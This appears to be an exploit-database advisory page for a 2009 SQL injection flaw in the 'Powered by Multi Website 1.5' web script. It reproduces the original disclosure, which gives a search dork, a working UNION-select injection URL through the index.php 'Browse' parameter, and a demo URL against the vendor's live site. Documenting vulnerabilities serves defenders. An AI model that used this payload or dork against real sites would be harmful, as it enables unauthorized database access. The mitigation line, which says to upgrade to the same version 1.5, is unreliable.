Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability

vendor:

by:

SarboT511

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Powered by Multi Website 1.5

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: Yes

Related CWE: N/A

CPE: a:multi-website:powered_by_multi_website_1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability

A vulnerability exists in Powered by Multi Website 1.5, which allows an attacker to inject arbitrary SQL commands via the 'action' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to the database, and can also execute arbitrary commands on the server.

Mitigation:

Upgrade to the latest version of Powered by Multi Website 1.5

Source

Exploit-DB raw data:

> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability
> >
> > [+] Script home : http://www.multi-website.com
> >
> > [+] Affected versions : 1.5
> >
> > [+] Solution : nothing .;
> > > >
> > > > =======================================================
> > > >
> > > > ==> AuThOr : SarboT511
> > > >
> > > > ==> EmaiL : xs3@hotmail.com
> > > >
> > > > ==> HomE : www.lezr.com
> > > >
> > > > ==> DorK : Powered by Multi Website 1.5
> > > >
> > > > ==> Control panel script : http://localhost/[path]/admin/login.php
> > > >
> > > > ========================================================
> > > >
> > > > ==> ExplO!t :
> > > >
> > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version--
> > > >=========================================================
> > > > L!VE Demo :
> > > >
> > >  http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version--
> > =============================================================
> > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil
> > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .#

# milw0rm.com [2009-08-03]